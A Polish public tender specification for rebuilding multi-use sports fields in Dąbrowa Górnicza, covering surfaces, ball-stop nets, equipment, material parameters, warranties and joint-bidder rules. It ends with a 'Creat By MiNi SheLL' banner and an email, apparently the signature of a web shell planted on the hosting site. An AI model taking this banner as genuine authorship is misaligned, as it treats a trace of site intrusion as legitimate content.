Przebudowa istniejącego boiska do piłki koszykowej o wymiarach 28,00 x 16,00 m z nawierzchnią asfaltową ograniczoną obrzeżami betonowymi 8 x 30cm oraz istniejącego boiska do piłki siatkowej o wymiarach 15,0 x 24,0m z nawierzchnią asfaltową. Przebudowa boisk będzie polegała na wykonaniu nowej nawierzchni poliuretanowej, na istniejących boiskach asfaltowych (po uprzednim przygotowaniu istniejącej nawierzchni asfaltobetonowej), oraz wykonaniu piłkochwytów o wysokości h=4,0 m z trzech stron  boiska do piłki ręcznej (mini nożnej) przy ul. Topolowej w  dzielnicy Łęknice w Dąbrowie Górniczej wraz z wykonaniem dokumentacji projektowej. 
Zagospodarowanie terenu istniejących boisk obejmuje; 
1. boisko wielofunkcyjne do gry w piłkę ręczną ( mini nożną) o pow. 448,00 m2
    oraz boisko wielofunkcyjne do gry w piłkę koszykową i  siatkową o pow. 
    360,00 m2   o nawierzchni syntetycznej poliuretanowej 
2. piłkochwyt z  trzech stron  boiska do piłki ręcznej (mini nożnej) .    
3. mała architektura: 3 ławki parkowe, 2 kosze na śmieci,
4. odwodnienie boiska,
5. zieleń.
Parametry techniczne przebudowywanych obiektów. 
- boisko wielofunkcyjne:  boisko do piłki  ręcznej (mini nożnej) o wymiarach 
  28,00 x1 6,00 m  o nawierzchni syntetycznej poliuretanowej w kolorze 
  ceglastym i zielonym, mieszczące w swym obrysie boisko o polu gry               
  26,00 x15,00 m, boisko wydzielone liniami szer.  5 cm w kolorze białym.
- boisko wielofunkcyjne:  boisko do piłki koszykowej o wymiarach                   
  24,00 x 15,00 m o nawierzchni syntetycznej poliuretanowej w kolorze 
  ceglastym, zielonym i żółtym , mieszczące w swym obrysie boisko do piłki 
  koszykowej o wymiarach 22,00 x13,00 m oraz boisko do siatkówki o 
   wymiarach 18,00 x 9,00 m, boiska wydzielone liniami szer. 5 cm w kolorze: 
   boisko koszykówki niebieskim , boisko do siatkówki żółtym
piłkochwyt; należy zamontować przy boisku do gry w piłkę ręczną (mini nożną) na długości jednego boku dłuższego  L1=  29,0 m i  dwóch krótszych   L2 =  2 x 16,5 m  o wysokości 4,00 m.  Piłkochwyty  systemowe z siatki polipropylenowej na słupach stalowych  w   rozstawie zgodnym z rysunkiem konstrukcyjnym. Słupy stalowe z profilu zamkniętego 80x80x3 mm, cynkowane i malowane proszkowo. Słupy skrajne rozparte zastrzałami o profilu 60 x 60 x 3mm  Siatka polipropylenowa o oczkach 10 x 10 cm o gr. 4,75 mm koloru zielonego.  Siatka rozpięta na linkach stalowych cynkowanych gr. 4 mm. Słupy w fundamentach betonowych B-20 o wymiarach O 300x1100 mm.  Wykonawca może zastosować dowolny system piłkochwytów sportowych spełniający w/w założenia. 
ławki parkowe, kosze na śmieci ; pomiędzy dwoma boiskami należy zamontować  3 ławki parkowe bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz 2 kosze na śmieci umieszczone między  ławkami. Ławki i kosze montowane na stałe w podłożu.
Odwodnienie:  odwodnienie nawierzchni boisk odbywało się będzie w sposób naturalny poprzez wyprofilowanie spadków płyty boisk rzędu 0,5% ze sprowadzeniem wody na tereny zieleni.
Ukształtowanie terenu: należy ukształtować w nawiązaniu do istniejących boisk asfaltowych i terenu otaczającego.
Zieleń: fragmenty terenu wolne od zabudowy  i nawierzchni utwardzonych, a zniszczonych  poprzez prowadzenie  robót budowlanych należy odtworzyć poprzez zazielenienie trawnikami wykonanymi metodą siewu. 
Nawierzchnia boisk: syntetyczna poliuretanowa w kolorze ceglastym i zielonym. Linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową w następujących kolorach: boisko do piłki ręcznej (mini piłki nożnej ) w kolorze białym, boisko do koszykówki w kolorze żółtym, boisko do siatkówki w kolorze niebieskim.
Boiska wyposażone w bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, stojaki do koszykówki o wysięgu 2,20 m i słupki do siatkówki z mechanizmem naciągowym i możliwością regulacji wysokości siatki.
Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni  urządzeń sportowych.
- boiska wielofunkcyjne
Stan istniejącej nawierzchni asfaltobetonowej boisk daje możliwość wykorzystania jej jako podbudowy pod nową nawierzchnię syntetyczną.
Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii :
- usunąć luźne fragmenty asfaltobetonu z powierzchni  podbudowy, rys i spękań,
- istniejące nieliczne ubytki asfaltobetonu uzupełnić betonem B-20 na pełną grubość asfaltobetonu,
-  na całej powierzchni wylać płytę betonową z betonu B-25  o gr. min 8 cm,
  z odpowiednimi spadkami rzędu 0,5 - 1,0 % ( boisko piłki ręcznej przy      
  brzegu boiska 8 cm, na środku boiska 12 cm, boisko wielofunkcyjne przy 
  brzegu boiska 8 cm, na środku boiska 12 cm, płytę ograniczyć nowymi 
  obrzeżami betonowymi 8 x 30 cm, po  uprzednim demontażu starych
-  podbudowa betonowa zatarta na ostro, zdylatowana (zgodnie ze sztuka 
  budowlana), wysezonowana - wilgotność rzędu 3-5 %
Na tak przygotowanej podbudowie wykonać nową nawierzchnię syntetyczną   poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty     elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym i zielonym.
Obiekty należy  wyposażyć w następujący sprzęt sportowy :
- dwie bramki do piłki ręcznej o wymiarach 3,00x2,00 m, konstrukcji stalowej z profilu 80x80 mm, cynkowane, montowane w tulejach na stałe  wyposażone w siatki polietylenowe PE-4 gł. 0,8/1,0 m  głębokość bramki 1,0 m ( produkt typowy ).  Bramki montowane zgodnie z zaleceniami producenta.
- dwa stojaki do koszykówki, stalowe cynkowane, montowane w tulei na stałe o wysięgu 1,60 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach   1,05 x 1,80 m z obejmą wzmocnioną cynkowaną i siatką łańcuszkową. Stojaki montowane zgodnie z zaleceniami producenta.
- jeden komplet słupków do siatkówki, aluminiowych o profilu owalnym, z mechanizmem naciągu i regulacji wysokości siatki, montowanych w tulejach z możliwością demontażu i zaślepienia tulei deklami o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0x1.0 m) w kolorze białym (produkt typowy).  Słupki montowane zgodnie z zaleceniami producenta.
ZADANIE F:
Budowa  boiska do koszykówki obok placu zabaw
Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych tj; 
Przebudowa istniejącego boiska do piłki nożnej o wym. 29,60 x 15,00 m z nawierzchnią trawiastą,wyposażone w dwie bramki stalowe oraz boisko do siatkówki z nawierzchnią trawiastą. Budowa boiska  do gry w streetballa  będzie polegała na wykonaniu boiska o wym. 10,00 x 10,00 m o  nawierzchni poliuretanowej i  piłkochwytów o wys. h= 4,0 m w dzielnicy Staszic ul. Bobrowa  wraz z wykonaniem dokumentacji projektowej.
Zagospodarowanie terenu obejmuje :
1. budowę boiska do gry w streetballa o pow. 100 m2   o nawierzchni 
    syntetycznej poliuretanowej, 
2. piłkochwyty  z trzech  stron boiska  o wysokości h= 4,0 m    
3. mała architektura: 4 ławki parkowe, 2 kosze na śmieci,
4. odwodnienie  boiska 
5. zieleń.
Parametry techniczne budowanego obiektu. 
- boisko do gry w streetballa o wymiarach 10,0 x 10,0 m   o nawierzchni syntetycznej poliuretanowej w kolorze ceglastym  i zielonym wyposażone w jeden stojak do koszykówki 
- piłkochwyt ; na długości jednego boku i szerokości boiska  należy  
   zamontować  piłkochwyt o długości 32,00 m i wysokości  4,00 m.
   Piłkochwyt systemowy z siatki polipropylenowej na słupach stalowych w   
   rozstawie zgodnym z rysunkiem konstrukcyjnym. Słupy stalowe z profilu 
   zamkniętego 80 x 80 x 3 mm, cynkowane i  malowane proszkowo. Słupy 
   skrajne rozparte zastrzałami z profilu  60x 60x3 mm. Siatka polipropylenowa 
   o oczkach 10x10 cm o gr. 4,75 mm koloru zielonego.  Siatka rozpięta na 
   linkach stalowych cynkowanych gr. 4 mm.   Słupy  osadzone w 
  fundamentach betonowych B-20 O300x1100 mm. Wykonawca może 
   zastosować dowolny system piłkochwytów sportowych spełniający w/w założenia. 
-  ławki parkowe, kosze na śmieci ; przy boisku w pasie zieleni należy zamontować  4 ławki parkowe bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz 2 kosze na śmieci umieszczone między  ławkami. Ławki i kosze montowane na stałe w podłożu.
Odwodnienie: odwodnienie nawierzchni boisk odbywało się będzie w sposób naturalny poprzez wyprofilowanie spadków płyty boisk rzędu 0,5% ze sprowadzeniem wody na tereny zieleni.
Ukształtowanie terenu: należy ukształtować w nawiązaniu do istniejących boisk trawiastych i terenu otaczającego.
Zieleń: fragmenty terenu wolne od zabudowy  i nawierzchni utwardzonych, a zniszczonych  poprzez prowadzenie  robót budowlanych należy odtworzyć poprzez zazielenienie trawnikami wykonanymi metodą siewu. 
Nawierzchnia boiska: syntetyczna poliuretanowa w kolorze ceglastym, i zielonym. Linie segregacyjne  boiska szer. 5 cm malowane farbą systemową poliuretanową w kolorze białym.  Boisko wyposażone w stojak do koszykówki o wysięgu 1,60 m.
Rozwiązania konstrukcyjno-materiałowe podbudów i nawierzchni  urządzeń sportowych.
boisko do streetballa: należy wykonać  następujący układ warstw podbudowy boiska sportowego:
- warstwa odsączająca z piasku - 10 cm  (po zagęszczeniu)
- warstwa kruszywa  frakcja  0 - 31,5 mm - 10 cm ( po zagęszczeniu)
- warstwa betonu B - 25 gr  10 cm ( zdylatowana),spadek jednostronny 
 0,5-1,0 %.  Całość ograniczona obrzeżami betonowymi 8x30 cm na ławie betonowej. 
Na tak przygotowanej podbudowie wykonać  nawierzchnię syntetyczną   poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty elastomerowej gr.~10 mm oraz poliuretanowego natrysku gr. ~3 mm, w kolorze ceglastym.

Wymagania ogólne dotyczące zadań A, B, C, D, E i F :
Parametry techniczne syntetycznej nawierzchni poliuretanowej :
Jest to nawierzchnia sportowa, poliuretanowo-gumowa o grubości warstwy13 mm - wersja podstawowa, wymagająca podbudowy asfaltobetonowej, betonowej lub podbudowy z mieszaniny kruszywa kwarcowego i granulatu gumowego połączonego lepiszczem poliuretanowym.  
Nawierzchnia ta jest przepuszczalna dla wody, o zwartej strukturze,  służy  do pokrywania nawierzchni bieżni lekkoatletycznych, sektorów i rozbiegów konkurencji technicznych zawodów dla, boisk wielofunkcyjnych, szkolnych, placów rekreacji ruchowej.
Warstwa nośna to  mieszanina granulatu gumowego i  lepiszcza poliuretanowego. Układana jest mechanicznie, bezspoinowo, przy pomocy rozkładarki mas poliuretanowych(np. Planomatic). Tak wykonaną warstwę należy pokryć warstwą użytkową, którą  stanowi system poliuretanowy  zmieszany z granulatem EPDM. Czynność tą wykonuje się  poprzez natrysk mechaniczny (przy użyciu specjalnej natryskarki np. firmy SMG). Grubość warstwy użytkowej 2-3 mm. Po całkowitym związaniu mieszaniny są malowane linie farbami poliuretanowymi metodą natrysku.
 
Nawierzchnia poliuretanowa powinna mieć parametry nie gorsze niż opisane poniżej:
 
Określenie parametru, Jednostka, Wartość wymagana
 
Wytrzymałość na rozciąganie, ( N/ mm2 ) -  1 - 1,1
Odporność na działanie zmiennych cykli hydrotechnicznych oceniona:
przyrostem masy, ( % ) - 0,3 - 0,4
zmianą wyglądu zewnętrznego - bez zmian
Odporność nawierzchni na działanie butów z kolcami:
-Spadek wytrzymałości na rozciąganie %- 5,0 - 8,0 
-Spadek wydłużenia przy zerwaniu % - 5,0 - 7,0 
Zmiana wymiarów po działaniu temperatury +60°C, ( % ) - 0,01-0,02
Wytrzymałość na rozdzieranie, (N)- 140 - 150 
Ścieralność - ubytek grubości w mm -0,08 - 0,09
 Współczynnik tarcia kinetycznego powierzchni:
w stanie suchym -  0,50 - 0,60
w stanie mokrym -  0,30 - 0,35
Przyczepność do podkładu, (MPa)
- betonowego - 0,6 - 0,7
- asfaltobetonowego - 0,5 - 0,6
- z mieszaniny kruszywa kwarcowego, granulatu gumowego i spoiwa 
  PU- 0,5 -0,6 
Mrozoodporność oceniona :
przyrostem masy (%) - 0,4 - 0,5
zmianą wyglądu zewnętrznego   - bez zmian 
Odporność na ścieranie wg metody Tabera (G) -1,1 - 1,2 
Nasiąkliwość (%)- 10 - 12 
Wydłużenie względne przy zerwaniu (%) -  48 - 50
Tłumienie energii 23°C (%) - 36-38

Zawartość metali ciężkich (mg/l):
ołów (Pb)-< 0,005
kadm (Cd)-< 0,0005
chrom (Cr)-< 0,005
rtęć (Hg)-< 0,0002
cynk (Zn)-0,8 - 0,9
cyna (Sn)-< 0,005
Nawierzchnia powinna być przyjazna dla otoczenia i ludzi korzystających z niej, a zawartość związków chemicznych  powinna być nie większa  niż opisana  powyżej .

Wszystkie dostarczone i zamontowane urządzenia sportowe i piłkochwyty muszą spełniać wymogi bezpieczeństwa i ergonomii, muszą być zgodne z normami lub dokumentami równoważnymi  wprowadzonymi do obowiązkowego  stosowania oraz wymaganiami określonymi w przepisach BHP oraz pozostałych przepisów prawa. Zastosowany sprzęt sportowy musi posiadać aktualne certyfikaty i  dopuszczenia do stosowania ze znakiem B

Wykonawca  jest odpowiedzialny za prowadzenie robót zgodnie  z obowiązującymi przepisami, normami i wytycznymi producenta nawierzchni syntetyczne poliuretanowej,  urządzeń sportowych i  piłkochwytów. Jednocześnie winien przestrzegać warunków umowy oraz odpowiada za jakość zastosowanych materiałów i wykonanego montażu oraz za ich zgodność z przedmiotem zamówienia. 
Roboty należy zrealizować na podstawie ;
-  programu funkcjonalno - użytkowego
-  wymogów  Specyfikacji Istotnych Warunków Zamówienia  wraz z projektem umowy,
- zasad wiedzy technicznej , sztuki budowlanej  i przepisów prawa     
Zamówienie musi  być realizowane  zgodnie z:
Ustawą  z dnia 7 lipca  1994 roku  Prawo budowlane (Dz.U. z 2013 r.   poz.1403 z późn. zm) Rozporządzeniem  Ministra Pracy i Polityki Socjalnej z dnia  26 września  1997 r. w sprawie ogólnych przepisów bezpieczeństwa  i higieny pracy( Dz.U. z 2003 r. Nr 169,poz.1650 z późn. zm) 
Rozwiązania  równoważne :
Zamawiający  dopuszcza zastosowanie  materiałów   równoważnych   
tj. o parametrach  technicznych i  jakościowych  nie gorszych  niż określone w SIWZ - w odniesieniu do materiałów, których pochodzenie zostało określone przez Zamawiającego w SIWZ i P.F.U. Zgodnie z art.30 ust.5 Ustawy Wykonawca, który powołuje się na rozwiązania  równoważne w stosunku do opisanych przez  zamawiającego, jest obowiązany wykazać , ze oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego pod względem parametrów technicznych, użytkowych  oraz eksploatacyjnych.
Gwarancja i rękojmia :
Wykonawca udziela 36  miesiące gwarancji na wykonane roboty licząc od daty podpisania przez obie strony protokołu odbioru wykonania przedmiotu umowy . W okresie tym Wykonawca zobowiązuje się usunąć  wynikłe wady nieodpłatnie w terminie do pięciu  dni od daty zgłoszenia ich przez Zamawiającego. 
Na wykonane  roboty Wykonawca  udziela  rękojmi na okres 24 miesięczny  licząc od daty podpisania  przez obie strony protokołu odbioru wykonania przedmiotu umowy.
4. Uszczegółowienie sekcji IV.2) KRYTERIA OCENY OFERT.
Oferty z nawierzchnią poliuretanową o parametrach jakościowych spełniających łącznie wszystkie przedstawione poniżej warunki otrzymają 40 pkt.:Określenie parametru, Jednostka, Wartość wymagana: Wytrzymałość na rozciąganie, ( N/ mm2 ), większa równa 1,05;
Odporność nawierzchni na działanie temperatury, wody i promieniowania UV (sztuczne starzenie) - badanie wg PN-EN 14877:2008:zmiana wytrzymałości na rozciąganie, ( %), 0; zmiana odporności na zużycie (ścieranie) po 1000 cyklach badawczych, (%), mniejsza równa 0,1; Odporność na działanie zmiennych cykli hydrotermicznych - oceniona zmianą właściwości technicznych nawierzchni po cyklach badawczych:zmniejszenie wytrzymałości na rozciąganie, ( %), 0; Odporność nawierzchni na zamrażanie: zmniejszenie wytrzymałości na rozciąganie, (%), mniejsza równa 8. Jakość oferowanej nawierzchni poliuretanowej będzie analizowana na podstawie dokumentów i próbek załączonych do oferty, wymienionych w pkt. 9.4. SIWZ.
5. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10% ceny brutto podanej w ofercie.
6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
6.1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
6.2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch  lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt   9.2. SIWZ przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Dokument wymieniony w  pkt. 9.3.  SIWZ  każdy z Wykonawców składa oddzielnie. 
6.3.Dokumenty i oświadczenia wymienione w  pkt. 9.1.2, 9.1.5. i 9.4. SIWZ Wykonawcy składają wspólnie, przy czym w przypadku polisy wymaganej w pkt. 9.1.4. SIWZ  Zamawiający dopuszcza także przedstawienie 
jednej polisy wystawionej na Wykonawców wspólnie ubiegających się o udzielenie  zamówienia. Oświadczenie wymienione w pkt. 9.1.1. SIWZ i formularz ofertowy wymieniony w pkt. 9.5.1. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców. Oświadczenia na podstawie art. 22 ust. 1 Ustawy (załącznik nr 2 do SIWZ) składają  wszyscy wykonawcy wspólnie na jednym druku lub pełnomocnik.
6.4. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
6.5. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com